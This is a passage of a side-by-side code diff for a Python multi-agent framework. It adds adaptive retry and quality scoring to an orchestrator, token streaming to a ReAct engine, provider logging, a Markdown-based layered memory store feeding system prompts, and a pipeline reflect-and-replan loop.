aggregated_result: dict[str, Any] aggregated_result: dict[str, Any]
status: TaskStatus status: TaskStatus
total_duration_ms: float total_duration_ms: float
metadata: dict[str, Any] = field(default_factory=dict)
@dataclass
class OrchestratorConfig:
    """Orchestrator configuration (settings for adaptive execution)."""

    # When False, execute_adaptive() returns the first execute() result unchanged.
    adaptive: bool = False
    # Upper bound on evaluate / re-execute rounds in execute_adaptive().
    max_iterations: int = 3
    # A result is accepted once its quality score reaches this value.
    quality_threshold: float = 0.7
class Orchestrator: class Orchestrator:
@ -103,6 +113,8 @@ class Orchestrator:
goal_planner: GoalPlanner | None = None, goal_planner: GoalPlanner | None = None,
plan_executor: PlanExecutor | None = None, plan_executor: PlanExecutor | None = None,
plan_checker: PlanChecker | None = None, plan_checker: PlanChecker | None = None,
config: OrchestratorConfig | None = None,
message_bus: Any = None,
): ):
""" """
Args: Args:
@ -114,6 +126,8 @@ class Orchestrator:
goal_planner: GoalPlanner 实例用于结构化目标分解可选 goal_planner: GoalPlanner 实例用于结构化目标分解可选
plan_executor: PlanExecutor 实例用于执行 ExecutionPlan可选 plan_executor: PlanExecutor 实例用于执行 ExecutionPlan可选
plan_checker: PlanChecker 实例用于检查和复盘可选 plan_checker: PlanChecker 实例用于检查和复盘可选
config: Orchestrator 配置包含自适应参数
message_bus: MessageBus 实例用于 Agent 间通信
""" """
self._agent_pool = agent_pool self._agent_pool = agent_pool
self._workspace = workspace or SharedWorkspace() self._workspace = workspace or SharedWorkspace()
@ -123,6 +137,8 @@ class Orchestrator:
self._goal_planner = goal_planner self._goal_planner = goal_planner
self._plan_executor = plan_executor self._plan_executor = plan_executor
self._plan_checker = plan_checker self._plan_checker = plan_checker
self._config = config or OrchestratorConfig()
self._message_bus = message_bus
async def execute(self, task: TaskMessage) -> OrchestrationResult: async def execute(self, task: TaskMessage) -> OrchestrationResult:
"""执行编排任务 """执行编排任务
@ -383,14 +399,64 @@ class Orchestrator:
agent.execute(sub_task_msg), agent.execute(sub_task_msg),
timeout=self._subtask_timeout, timeout=self._subtask_timeout,
) )
return { output = {
"status": "completed", "status": "completed",
"output": result.output_data if hasattr(result, "output_data") else result, "output": result.output_data if hasattr(result, "output_data") else result,
} }
# Publish progress via MessageBus if available
if self._message_bus is not None:
try:
from agentkit.bus.message import AgentMessage
await self._message_bus.publish(AgentMessage(
sender=subtask.assigned_agent,
recipient="orchestrator",
topic="task.progress",
payload={
"task_id": subtask.task_id,
"status": "completed",
},
))
except Exception as e:
logger.warning(f"Failed to publish progress via MessageBus: {e}")
return output
except asyncio.TimeoutError: except asyncio.TimeoutError:
return {"status": "failed", "error": "Subtask timed out"} error_result = {"status": "failed", "error": "Subtask timed out"}
if self._message_bus is not None:
try:
from agentkit.bus.message import AgentMessage
await self._message_bus.publish(AgentMessage(
sender=subtask.assigned_agent,
recipient="orchestrator",
topic="task.progress",
payload={
"task_id": subtask.task_id,
"status": "failed",
"error": "Subtask timed out",
},
))
except Exception as e:
logger.warning(f"Failed to publish progress via MessageBus: {e}")
return error_result
except Exception as e: except Exception as e:
return {"status": "failed", "error": str(e)} error_result = {"status": "failed", "error": str(e)}
if self._message_bus is not None:
try:
from agentkit.bus.message import AgentMessage
await self._message_bus.publish(AgentMessage(
sender=subtask.assigned_agent,
recipient="orchestrator",
topic="task.progress",
payload={
"task_id": subtask.task_id,
"status": "failed",
"error": str(e),
},
))
except Exception as e:
logger.warning(f"Failed to publish progress via MessageBus: {e}")
return error_result
def _inject_dependency_results( def _inject_dependency_results(
self, self,
@ -497,3 +563,258 @@ class Orchestrator:
except Exception: except Exception:
pass pass
return None return None
async def execute_adaptive(
    self, task: TaskMessage,
) -> OrchestrationResult:
    """Adaptive orchestration: execute, evaluate, then retry failed subtasks.

    Runs ``execute()`` once. With ``config.adaptive`` disabled that result is
    returned unchanged. Otherwise the result is scored with
    ``_evaluate_quality``; while the score stays below
    ``config.quality_threshold`` and fewer than ``config.max_iterations``
    rounds have run, the failed subtasks are re-executed through
    ``_reexecute_failed`` (completed subtask results are kept) and the
    merged result is scored again.

    A result reported as COMPLETED is scored as well, so a finished but
    low-quality or partially failed run still enters the retry loop.

    Args:
        task: The original task message.

    Returns:
        OrchestrationResult: In adaptive mode ``metadata["iterations"]``
        holds the per-round score and feedback, and
        ``metadata["quality_score"]`` is set when the threshold was reached.
    """
    # First execution
    result = await self.execute(task)
    if not self._config.adaptive:
        return result

    iteration_history: list[dict[str, Any]] = []
    current_result = result

    for iteration in range(1, self._config.max_iterations + 1):
        # Evaluate quality
        quality = await self._evaluate_quality(task, current_result)
        iteration_history.append({
            "iteration": iteration,
            "quality_score": quality["score"],
            "feedback": quality.get("feedback", ""),
        })

        if quality["score"] >= self._config.quality_threshold:
            logger.info(
                f"Adaptive iteration {iteration}: quality "
                f"{quality['score']:.2f} >= {self._config.quality_threshold}"
            )
            current_result.metadata["quality_score"] = quality["score"]
            current_result.metadata["iterations"] = iteration_history
            return current_result

        logger.info(
            f"Adaptive iteration {iteration}: quality "
            f"{quality['score']:.2f} < {self._config.quality_threshold}, "
            f"re-decomposing failed subtasks"
        )

        # Re-execute failed subtasks
        new_result = await self._reexecute_failed(
            task, current_result, quality,
        )
        if new_result is current_result:
            # _reexecute_failed hands back its input when no subtask failed;
            # another round would only re-score the identical result.
            break
        current_result = new_result

    # Iterations exhausted, or nothing left to retry
    current_result.metadata["iterations"] = iteration_history
    return current_result
async def _evaluate_quality(
    self,
    task: TaskMessage,
    result: OrchestrationResult,
) -> dict[str, Any]:
    """Score the quality of an orchestration result.

    Uses the LLM evaluator when a gateway is configured and falls back to
    the rule-based evaluator when there is no gateway or the LLM
    evaluation raises.

    Returns:
        Dict with "score" (0-1) and optional "feedback" string.
    """
    if self._llm_gateway is not None:
        try:
            return await self._llm_evaluate(task, result)
        except Exception as exc:
            logger.warning(f"LLM evaluation failed, falling back to rule-based: {exc}")

    # No gateway, or the LLM path failed above.
    return self._rule_based_evaluate(result)
def _rule_based_evaluate(
    self, result: OrchestrationResult,
) -> dict[str, Any]:
    """Rule-based quality evaluation: the score is the completion rate.

    Returns:
        Dict with "score" (completed subtasks / all subtasks, or 0.0 when
        there are none) and "feedback" listing the ids of subtasks whose
        status is not "completed" (empty string when all completed).
    """
    outcomes = result.subtask_results
    total = len(outcomes)
    if total == 0:
        return {"score": 0.0, "feedback": "No subtasks executed"}

    unfinished = [
        task_id for task_id, outcome in outcomes.items()
        if outcome.get("status") != "completed"
    ]
    score = (total - len(unfinished)) / total
    feedback = f"Failed subtasks: {unfinished}" if score < 1.0 else ""
    return {"score": score, "feedback": feedback}
async def _llm_evaluate(
    self,
    task: TaskMessage,
    result: OrchestrationResult,
) -> dict[str, Any]:
    """Evaluate the quality of the subtask results with the LLM.

    Sends a summary of every subtask (id, status, first 200 characters of
    its output) to the gateway's "default" model and parses the JSON reply.
    When the reply cannot be parsed into a numeric score, the rule-based
    evaluation is returned instead.

    Returns:
        Dict with "score" clamped to the range 0-1 and "feedback".
    """
    import json

    subtask_summary = [
        {
            "task_id": tid,
            "status": r.get("status", "unknown"),
            "output_preview": str(r.get("output", ""))[:200],
        }
        for tid, r in result.subtask_results.items()
    ]

    prompt = (
        f"Evaluate the quality of the following orchestration result.\n\n"
        f"Original task: {task.input_data}\n"
        f"Subtask results:\n{json.dumps(subtask_summary, ensure_ascii=False)}\n\n"
        f'Respond ONLY with JSON: {{"score": 0.0-1.0, "feedback": "..."}}\n'
        f"Score 1.0 = perfect, 0.0 = completely failed."
    )

    response = await self._llm_gateway.chat(
        messages=[{"role": "user", "content": prompt}],
        model="default",
    )

    try:
        text = (response.content or "").strip()
        if text.startswith("```"):
            # Drop the opening fence line, and the closing fence only when it
            # is really there, so an unterminated block keeps its last line.
            lines = text.split("\n")[1:]
            if lines and lines[-1].strip().startswith("```"):
                lines = lines[:-1]
            text = "\n".join(lines)
        data = json.loads(text)
        # The model may answer outside the requested range; keep the score
        # comparable with quality_threshold.
        score = min(1.0, max(0.0, float(data.get("score", 0.0))))
        return {
            "score": score,
            "feedback": data.get("feedback", ""),
        }
    except (json.JSONDecodeError, ValueError, TypeError, AttributeError) as e:
        # TypeError / AttributeError cover replies such as a JSON list or a
        # null score, which are not JSON syntax errors.
        logger.warning(f"Failed to parse LLM evaluation: {e}")
        return self._rule_based_evaluate(result)
async def _reexecute_failed(
    self,
    task: TaskMessage,
    previous_result: OrchestrationResult,
    quality: dict[str, Any],
) -> OrchestrationResult:
    """Re-run the subtasks that did not complete and merge the outcomes.

    Every subtask whose status is not "completed" is resubmitted as
    ``retry-<id>`` with the parent task's input plus the previous error and
    the evaluator feedback. Completed results are carried over untouched,
    retry results replace the failed ones, and the merged set is
    re-aggregated.

    Returns:
        ``previous_result`` itself when nothing failed; otherwise a new
        OrchestrationResult whose status is FAILED only if every merged
        subtask failed.
    """
    import time as _time

    started_at = _time.monotonic()
    prior_results = previous_result.subtask_results

    # Identify failed subtasks
    failed_task_ids = [
        tid for tid, outcome in prior_results.items()
        if outcome.get("status") != "completed"
    ]
    if not failed_task_ids:
        return previous_result

    # One retry subtask per failure, carrying the error and the feedback
    new_subtasks = [
        SubTask(
            task_id=f"retry-{tid}",
            parent_task_id=task.task_id,
            assigned_agent=task.agent_name,
            task_type=task.task_type,
            input_data={
                **task.input_data,
                "previous_error": prior_results[tid].get("error", ""),
                "improvement_feedback": quality.get("feedback", ""),
            },
        )
        for tid in failed_task_ids
    ]

    # Mini-plan: all retries form a single parallel group
    plan = OrchestrationPlan(
        plan_id=f"retry-{previous_result.plan_id}",
        parent_task_id=task.task_id,
        subtasks=new_subtasks,
        parallel_groups=[[retry.task_id for retry in new_subtasks]],
    )
    retry_results = await self._execute_plan(plan, task)

    # Merge: completed results first, then retries under their original ids
    merged_results = {
        tid: outcome for tid, outcome in prior_results.items()
        if outcome.get("status") == "completed"
    }
    for retry_tid, outcome in retry_results.items():
        merged_results[retry_tid.replace("retry-", "", 1)] = outcome

    # Re-aggregate over subtasks rebuilt from the merged outcomes
    all_subtasks = [
        SubTask(
            task_id=tid,
            parent_task_id=task.task_id,
            assigned_agent=task.agent_name,
            task_type=task.task_type,
            input_data=task.input_data,
            status=(
                SubTaskStatus.COMPLETED
                if outcome.get("status") == "completed"
                else SubTaskStatus.FAILED
            ),
            result=outcome.get("output"),
        )
        for tid, outcome in merged_results.items()
    ]
    retry_plan = OrchestrationPlan(
        plan_id=plan.plan_id,
        parent_task_id=task.task_id,
        subtasks=all_subtasks,
        parallel_groups=[],
    )
    aggregated = await self._aggregate_results(retry_plan, merged_results, task)

    failed_count = sum(
        1 for outcome in merged_results.values()
        if outcome.get("status") != "completed"
    )
    # Partial failure still counts as COMPLETED; only a total failure is FAILED.
    if failed_count == len(merged_results):
        status = TaskStatus.FAILED
    else:
        status = TaskStatus.COMPLETED

    return OrchestrationResult(
        plan_id=plan.plan_id,
        parent_task_id=task.task_id,
        subtask_results=merged_results,
        aggregated_result=aggregated,
        status=status,
        total_duration_ms=(_time.monotonic() - started_at) * 1000,
    )

View File

@ -16,6 +16,7 @@ from typing import TYPE_CHECKING, Any
from agentkit.core.exceptions import TaskCancelledError, TaskTimeoutError from agentkit.core.exceptions import TaskCancelledError, TaskTimeoutError
from agentkit.core.protocol import CancellationToken from agentkit.core.protocol import CancellationToken
from agentkit.llm.gateway import LLMGateway from agentkit.llm.gateway import LLMGateway
from agentkit.llm.protocol import LLMResponse
from agentkit.tools.base import Tool from agentkit.tools.base import Tool
from agentkit.telemetry.tracing import get_tracer, start_span, _OTEL_AVAILABLE from agentkit.telemetry.tracing import get_tracer, start_span, _OTEL_AVAILABLE
from agentkit.telemetry.metrics import ( from agentkit.telemetry.metrics import (
@ -59,7 +60,7 @@ class ReActResult:
class ReActEvent: class ReActEvent:
"""ReAct 执行事件""" """ReAct 执行事件"""
event_type: str # "thinking", "tool_call", "tool_result", "final_answer", "error" event_type: str # "thinking", "token", "tool_call", "tool_result", "final_answer", "error"
step: int step: int
data: dict[str, Any] = field(default_factory=dict) data: dict[str, Any] = field(default_factory=dict)
timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat()) timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
@ -533,14 +534,42 @@ class ReActEngine:
data={"message": f"Step {step}: Calling LLM..."}, data={"message": f"Step {step}: Calling LLM..."},
) )
# Think: call LLM # Think: call LLM (with optional token streaming)
llm_start = time.monotonic() llm_start = time.monotonic()
response = await self._llm_gateway.chat(
# Use streaming for token-by-token output
stream_content = ""
stream_usage = None
stream_tool_calls: list[Any] = []
stream_model = model
async for chunk in self._llm_gateway.chat_stream(
messages=conversation, messages=conversation,
model=model, model=model,
agent_name=agent_name, agent_name=agent_name,
task_type=task_type, task_type=task_type,
tools=tool_schemas, tools=tool_schemas,
):
if chunk.content:
stream_content += chunk.content
yield ReActEvent(
event_type="token",
step=step,
data={"content": chunk.content},
)
if chunk.usage:
stream_usage = chunk.usage
if chunk.tool_calls:
stream_tool_calls = chunk.tool_calls
if chunk.model:
stream_model = chunk.model
# Build response-like object from stream
response = self._build_response_from_stream(
content=stream_content,
tool_calls=stream_tool_calls,
usage=stream_usage,
model=stream_model,
) )
llm_duration_ms = int((time.monotonic() - llm_start) * 1000) llm_duration_ms = int((time.monotonic() - llm_start) * 1000)
@ -776,6 +805,24 @@ class ReActEngine:
schemas.append(schema) schemas.append(schema)
return schemas return schemas
@staticmethod
def _build_response_from_stream(
    content: str,
    tool_calls: list[Any],
    usage: Any,
    model: str,
) -> LLMResponse:
    """Assemble one ``LLMResponse`` from the pieces gathered while streaming.

    Args:
        content: Concatenated text of every streamed chunk.
        tool_calls: Tool calls reported by the stream (may be empty).
        usage: Token usage reported by the stream, or ``None`` when the
            provider never sent one; a default ``TokenUsage()`` is used then.
        model: Name of the model that produced the stream.

    Returns:
        An ``LLMResponse`` carrying the four values above.
    """
    from agentkit.llm.protocol import LLMResponse, TokenUsage

    effective_usage = TokenUsage() if usage is None else usage
    return LLMResponse(
        content=content,
        tool_calls=tool_calls,
        usage=effective_usage,
        model=model,
    )
def _find_tool(self, name: str, tools: list[Tool]) -> Tool | None: def _find_tool(self, name: str, tools: list[Tool]) -> Tool | None:
"""根据名称从可用工具中查找工具""" """根据名称从可用工具中查找工具"""
for tool in tools: for tool in tools:

View File

@ -93,6 +93,8 @@ class OpenAICompatibleProvider(LLMProvider):
payload["tools"] = request.tools payload["tools"] = request.tools
payload["tool_choice"] = request.tool_choice payload["tool_choice"] = request.tool_choice
logger.debug(f"Chat request to {url}: model={request.model}, messages={len(request.messages)}, tools={len(request.tools or [])}")
start = time.monotonic() start = time.monotonic()
try: try:
@ -108,6 +110,7 @@ class OpenAICompatibleProvider(LLMProvider):
error_msg = error_body.get("error", {}).get("message", "Request failed") error_msg = error_body.get("error", {}).get("message", "Request failed")
except Exception: except Exception:
error_msg = f"HTTP {resp.status_code}" error_msg = f"HTTP {resp.status_code}"
logger.error(f"Chat request failed: HTTP {resp.status_code}, error: {error_msg}")
# 不在错误消息中暴露完整响应体,防止 API Key 泄露 # 不在错误消息中暴露完整响应体,防止 API Key 泄露
raise LLMProviderError("openai", f"HTTP {resp.status_code}: {error_msg}") raise LLMProviderError("openai", f"HTTP {resp.status_code}: {error_msg}")
@ -177,19 +180,27 @@ class OpenAICompatibleProvider(LLMProvider):
"temperature": request.temperature, "temperature": request.temperature,
"max_tokens": request.max_tokens, "max_tokens": request.max_tokens,
"stream": True, "stream": True,
"stream_options": {"include_usage": True},
} }
if request.tools: if request.tools:
payload["tools"] = request.tools payload["tools"] = request.tools
payload["tool_choice"] = request.tool_choice payload["tool_choice"] = request.tool_choice
logger.debug(f"Stream request to {url}: model={request.model}, messages={len(request.messages)}, tools={len(request.tools or [])}")
response_ctx = self._client.stream("POST", url, json=payload, headers=headers) response_ctx = self._client.stream("POST", url, json=payload, headers=headers)
response = await response_ctx.__aenter__() response = await response_ctx.__aenter__()
if response.status_code != 200: if response.status_code != 200:
await response.aread() await response.aread()
await response_ctx.__aexit__(None, None, None) await response_ctx.__aexit__(None, None, None)
raise LLMProviderError("openai", f"HTTP {response.status_code}") # Parse error body for detailed message
try:
error_body = response.json()
error_msg = error_body.get("error", {}).get("message", f"HTTP {response.status_code}")
except Exception:
error_msg = f"HTTP {response.status_code}"
logger.error(f"Stream request failed: HTTP {response.status_code}, error: {error_msg}")
raise LLMProviderError("openai", f"HTTP {response.status_code}: {error_msg}")
return _StreamContext(response_ctx, response) return _StreamContext(response_ctx, response)

View File

@ -15,6 +15,7 @@ from agentkit.memory.query_transformer import (
TransformedQuery, TransformedQuery,
create_query_transformer, create_query_transformer,
) )
from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot
__all__ = [ __all__ = [
"Memory", "Memory",
@ -31,4 +32,7 @@ __all__ = [
"NoOpQueryTransformer", "NoOpQueryTransformer",
"TransformedQuery", "TransformedQuery",
"create_query_transformer", "create_query_transformer",
"MemoryFile",
"MemoryStore",
"MemorySnapshot",
] ]

View File

@ -0,0 +1,294 @@
"""分层记忆系统 — SOUL/USER/MEMORY/DAILY 文件管理.
参考 Hermes/OpenClaw 架构实现 Agent 人格用户档案工作笔记
日志的持久化存储与 system prompt 注入
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone
from pathlib import Path
from typing import Any
class MemoryFile:
"""单个记忆文件的管理器,支持 section 级别 CRUD 和容量控制.
文件格式为 Markdown使用 `## Section` 组织内容::
## 身份
我是小王一个专业的 AI 助手
## 性格
友好耐心注重细节
"""
def __init__(self, path: Path, char_budget: int | None = None):
self.path = Path(path)
self.char_budget = char_budget
def read(self) -> str:
"""读取整个文件内容,文件不存在返回空字符串."""
if not self.path.exists():
return ""
return self.path.read_text(encoding="utf-8")
def write(self, content: str) -> None:
"""写入内容,自动创建父目录,超容量时自动裁剪."""
self.path.parent.mkdir(parents=True, exist_ok=True)
self.path.write_text(content, encoding="utf-8")
if self.char_budget and len(content) > self.char_budget:
self.trim_to_budget()
def read_section(self, name: str) -> str:
"""读取指定 section 的内容(不含标题行)."""
content = self.read()
if not content:
return ""
# 匹配 ## name 后面的内容,直到下一个 ## 或文件末尾
pattern = rf"^## {re.escape(name)}\s*\n(.*?)(?=^## |\Z)"
match = re.search(pattern, content, re.MULTILINE | re.DOTALL)
if match:
return match.group(1).strip()
return ""
def add_section(self, name: str, content: str) -> None:
"""追加内容到指定 section不存在则创建."""
existing = self.read()
section_content = self.read_section(name)
if section_content:
# 追加到已有 section
old_text = section_content
new_text = f"{old_text}\n{content}"
self.replace_section(name, old_text, new_text)
else:
# 创建新 section
new_section = f"\n## {name}\n{content}"
if existing and not existing.endswith("\n"):
new_section = "\n" + new_section
self.write(existing + new_section)
def replace_section(self, name: str, old_text: str, new_text: str) -> bool:
"""替换 section 内的文本,返回是否成功."""
section_content = self.read_section(name)
if old_text not in section_content:
return False
full_content = self.read()
# 替换 section 内的文本
pattern = rf"(^## {re.escape(name)}\s*\n)(.*?)(?=^## |\Z)"
match = re.search(pattern, full_content, re.MULTILINE | re.DOTALL)
if not match:
return False
original_section_body = match.group(2)
new_section_body = original_section_body.replace(old_text, new_text, 1)
updated = full_content[: match.start(2)] + new_section_body + full_content[match.end(2) :]
self.write(updated)
return True
def remove_section(self, name: str) -> None:
"""删除整个 section含标题行."""
content = self.read()
if not content:
return
pattern = rf"^## {re.escape(name)}\s*\n.*?(?=^## |\Z)"
new_content = re.sub(pattern, "", content, flags=re.MULTILINE | re.DOTALL).strip()
self.write(new_content)
def list_sections(self) -> list[str]:
"""列出所有 section 名称."""
content = self.read()
if not content:
return []
return re.findall(r"^## (.+)$", content, re.MULTILINE)
def trim_to_budget(self) -> None:
"""裁剪内容到容量上限,优先保留前面的 section."""
if not self.char_budget:
return
content = self.read()
if len(content) <= self.char_budget:
return
# 从末尾裁剪,保留前面的 section
self.write(content[: self.char_budget])
@dataclass
class MemorySnapshot:
    """Point-in-time copy of the text held in every memory file."""

    soul: str = ""
    user: str = ""
    memory: str = ""
    daily: str = ""
    total_chars: int = 0

    def is_empty(self) -> bool:
        """Return ``True`` when none of the four memory texts has content."""
        for text in (self.soul, self.user, self.memory, self.daily):
            if text:
                return False
        return True
# Capacity limits for each memory file, measured in characters.
# They are passed as `char_budget` to the MemoryFile instances built by MemoryStore.
SOUL_BUDGET = 2000
USER_BUDGET = 1400
MEMORY_BUDGET = 2200
DAILY_BUDGET = 1000 # limit for a single day's log file
# Default SOUL.md content, written by MemoryStore.ensure_defaults() when SOUL.md is empty or missing.
DEFAULT_SOUL = """## 身份
我是 AgentKit一个专业的 AI 助手
## 性格
专业友好注重细节
## 说话方式
简洁清晰偶尔使用比喻帮助理解
## 做事准则
- 准确回答用户问题
- 主动记住用户提到的偏好和信息
- 不确定时坦诚说明
"""
class MemoryStore:
    """Manage the four kinds of memory files: SOUL, USER, MEMORY and DAILY.

    Storage layout::

        base_dir/
            SOUL.md
            memories/
                USER.md
                MEMORY.md
                daily/
                    2026-06-07.md
                    2026-06-08.md
    """

    def __init__(self, base_dir: Path | str | None = None):
        """Create the store, making ``base_dir`` and the daily-log directory.

        Args:
            base_dir: Root directory of the store; defaults to
                ``~/.agentkit`` when ``None``.
        """
        if base_dir is None:
            base_dir = Path.home() / ".agentkit"
        self.base_dir = Path(base_dir)
        self.base_dir.mkdir(parents=True, exist_ok=True)

        memories_dir = self.base_dir / "memories"
        self._soul = MemoryFile(self.base_dir / "SOUL.md", char_budget=SOUL_BUDGET)
        self._user = MemoryFile(memories_dir / "USER.md", char_budget=USER_BUDGET)
        self._memory = MemoryFile(memories_dir / "MEMORY.md", char_budget=MEMORY_BUDGET)
        self._daily_dir = memories_dir / "daily"
        self._daily_dir.mkdir(parents=True, exist_ok=True)

    def get_file(self, file_key: str) -> MemoryFile:
        """Return the ``MemoryFile`` for *file_key*.

        Args:
            file_key: ``"soul"``, ``"user"``, ``"memory"`` or ``"daily"``.
                ``"daily"`` resolves to today's (UTC) log file.

        Raises:
            ValueError: If *file_key* is not one of the four keys.
        """
        mapping = {
            "soul": self._soul,
            "user": self._user,
            "memory": self._memory,
        }
        if file_key in mapping:
            return mapping[file_key]
        if file_key == "daily":
            today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
            return MemoryFile(self._daily_dir / f"{today}.md", char_budget=DAILY_BUDGET)
        raise ValueError(f"Invalid file_key: {file_key}. Must be soul/user/memory/daily")

    def ensure_defaults(self) -> None:
        """Write the default SOUL.md when the file is missing or empty."""
        if not self._soul.read():
            self._soul.write(DEFAULT_SOUL.strip())

    def load_all(self) -> MemorySnapshot:
        """Read every memory file and return the combined snapshot."""
        soul = self._soul.read()
        user = self._user.read()
        memory = self._memory.read()
        daily = self.load_daily_logs()
        return MemorySnapshot(
            soul=soul,
            user=user,
            memory=memory,
            daily=daily,
            total_chars=len(soul) + len(user) + len(memory) + len(daily),
        )

    def load_daily_logs(self, days: int = 2) -> str:
        """Return the logs of the most recent *days* days, newest first.

        Each non-empty day is rendered as ``### YYYY-MM-DD`` followed by the
        file content; days are separated by a blank line.
        """
        from datetime import timedelta

        # Read the clock once so every offset is relative to the same instant;
        # otherwise a midnight rollover mid-loop could load one date twice.
        now = datetime.now(timezone.utc)
        parts: list[str] = []
        for offset in range(days):
            stamp = (now - timedelta(days=offset)).strftime("%Y-%m-%d")
            content = MemoryFile(self._daily_dir / f"{stamp}.md").read()
            if content:
                parts.append(f"### {stamp}\n{content}")
        return "\n\n".join(parts)

    def archive_old_dailies(self, keep_days: int = 2) -> int:
        """Delete daily logs dated more than *keep_days* days ago.

        Files whose stem is not a ``YYYY-MM-DD`` date are left untouched.

        Returns:
            The number of files deleted.
        """
        from datetime import timedelta

        if not self._daily_dir.exists():
            return 0
        cutoff = datetime.now(timezone.utc) - timedelta(days=keep_days)
        count = 0
        for f in self._daily_dir.glob("*.md"):
            # Only the date parsing is expected to fail; keep the try narrow.
            try:
                file_date = datetime.strptime(f.stem, "%Y-%m-%d").replace(tzinfo=timezone.utc)
            except ValueError:
                continue
            if file_date < cutoff:
                f.unlink()
                count += 1
        return count

    def build_system_prompt(self, snapshot: MemorySnapshot, base_prompt: str = "") -> str:
        """Inject the snapshot into a system prompt.

        Non-empty parts are emitted in this order, separated by blank lines::

            <agent-identity>
            [SOUL.md content]
            </agent-identity>

            <user-profile>
            [USER.md content]
            </user-profile>

            <agent-notes>
            [MEMORY.md content]
            </agent-notes>

            <recent-activity>
            [daily log content]
            </recent-activity>

            [base_prompt]

        Returns:
            The assembled prompt, or *base_prompt* when nothing was added.
        """
        tagged = (
            ("agent-identity", snapshot.soul),
            ("user-profile", snapshot.user),
            ("agent-notes", snapshot.memory),
            ("recent-activity", snapshot.daily),
        )
        parts: list[str] = [f"<{tag}>\n{text}\n</{tag}>" for tag, text in tagged if text]
        if base_prompt:
            parts.append(base_prompt)
        return "\n\n".join(parts) if parts else base_prompt

View File

@ -1,6 +1,12 @@
"""AgentKit Orchestrator - 多 Agent 协同编排""" """AgentKit Orchestrator - 多 Agent 协同编排"""
from agentkit.orchestrator.pipeline_schema import Pipeline, PipelineStage, StageStatus from agentkit.orchestrator.pipeline_schema import (
Pipeline,
PipelineStage,
StageStatus,
AdaptiveConfig,
ReflectionReport,
)
from agentkit.orchestrator.pipeline_engine import PipelineEngine from agentkit.orchestrator.pipeline_engine import PipelineEngine
from agentkit.orchestrator.pipeline_loader import PipelineLoader from agentkit.orchestrator.pipeline_loader import PipelineLoader
from agentkit.orchestrator.handoff import HandoffManager from agentkit.orchestrator.handoff import HandoffManager
@ -17,11 +23,14 @@ from agentkit.orchestrator.compensation import (
CompensationResult, CompensationResult,
SagaOrchestrator, SagaOrchestrator,
) )
from agentkit.orchestrator.reflection import PipelineReflector, PipelineReplanner
__all__ = [ __all__ = [
"Pipeline", "Pipeline",
"PipelineStage", "PipelineStage",
"StageStatus", "StageStatus",
"AdaptiveConfig",
"ReflectionReport",
"PipelineEngine", "PipelineEngine",
"PipelineLoader", "PipelineLoader",
"HandoffManager", "HandoffManager",
@ -35,4 +44,6 @@ __all__ = [
"CompletedStep", "CompletedStep",
"CompensationResult", "CompensationResult",
"SagaOrchestrator", "SagaOrchestrator",
"PipelineReflector",
"PipelineReplanner",
] ]

View File

@ -8,12 +8,15 @@ from typing import Any
from agentkit.orchestrator.compensation import SagaOrchestrator from agentkit.orchestrator.compensation import SagaOrchestrator
from agentkit.orchestrator.pipeline_schema import ( from agentkit.orchestrator.pipeline_schema import (
AdaptiveConfig,
Pipeline, Pipeline,
PipelineResult, PipelineResult,
PipelineStage, PipelineStage,
ReflectionReport,
StageResult, StageResult,
StageStatus, StageStatus,
) )
from agentkit.orchestrator.reflection import PipelineReflector, PipelineReplanner
from agentkit.orchestrator.retry import StepRetryPolicy, execute_with_retry from agentkit.orchestrator.retry import StepRetryPolicy, execute_with_retry
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
@ -32,16 +35,90 @@ class PipelineEngine:
- 状态持久化可选 - 状态持久化可选
""" """
def __init__(self, dispatcher: Any = None, state_manager: Any = None): def __init__(self, dispatcher: Any = None, state_manager: Any = None, llm_gateway: Any = None):
self._dispatcher = dispatcher self._dispatcher = dispatcher
self._state_manager = state_manager self._state_manager = state_manager
self._llm_gateway = llm_gateway
async def execute( async def execute(
self, self,
pipeline: Pipeline, pipeline: Pipeline,
context: dict[str, Any] | None = None, context: dict[str, Any] | None = None,
adaptive_config: AdaptiveConfig | None = None,
) -> PipelineResult: ) -> PipelineResult:
"""执行 Pipeline""" """执行 Pipeline
Args:
pipeline: Pipeline 定义
context: 运行时上下文变量
adaptive_config: 自适应配置启用反思-重规划闭环
"""
# First execution
result = await self._execute_pipeline(pipeline, context)
# If failed and adaptive is enabled, enter reflection-replanning loop
if result.status == StageStatus.FAILED and adaptive_config and adaptive_config.enabled:
result = await self._adaptive_loop(pipeline, context, result, adaptive_config)
return result
async def _adaptive_loop(
    self,
    pipeline: Pipeline,
    context: dict[str, Any] | None,
    failed_result: PipelineResult,
    adaptive_config: AdaptiveConfig,
) -> PipelineResult:
    """Run the reflect -> replan -> re-execute cycle after a failed run.

    Each round asks the reflector for a report on the latest failure, asks
    the replanner for a corrected pipeline, and executes that pipeline. The
    reports gathered so far are stored under ``metadata["reflections"]`` of
    the latest result.

    Args:
        pipeline: The pipeline that failed.
        context: Runtime variables passed to every re-execution.
        failed_result: Result of the failed first execution.
        adaptive_config: Supplies ``max_reflections``, the round limit.

    Returns:
        The first result whose status is ``COMPLETED``, otherwise the result
        of the last attempt (or ``failed_result`` if no round ran).
    """
    reflector = PipelineReflector(llm_gateway=self._llm_gateway)
    replanner = PipelineReplanner(llm_gateway=self._llm_gateway)

    active_pipeline = pipeline
    latest_result = failed_result
    history: list[ReflectionReport] = []

    for attempt in range(1, adaptive_config.max_reflections + 1):
        # 1. Reflect on the most recent failure.
        report = await reflector.reflect(active_pipeline, latest_result, attempt)
        history.append(report)
        logger.info(
            f"Pipeline reflection #{attempt}: "
            f"failure_type={report.failure_type}, "
            f"root_cause={report.root_cause}"
        )

        # 2. Build a corrected pipeline from the report.
        revised = await replanner.replan(active_pipeline, latest_result, report)
        logger.info(f"Pipeline replanned: {revised.name} ({len(revised.stages)} stages)")

        # 3. Run the corrected pipeline; it becomes the baseline for the next round.
        latest_result = await self._execute_pipeline(revised, context)
        active_pipeline = revised

        # Attach the reflection history to the fresh result.
        latest_result.metadata["reflections"] = [entry.model_dump() for entry in history]

        if latest_result.status == StageStatus.COMPLETED:
            logger.info(f"Pipeline succeeded after {attempt} reflection(s)")
            return latest_result

    # Every allowed round was used without success.
    logger.warning(
        f"Pipeline failed after {adaptive_config.max_reflections} reflection(s)"
    )
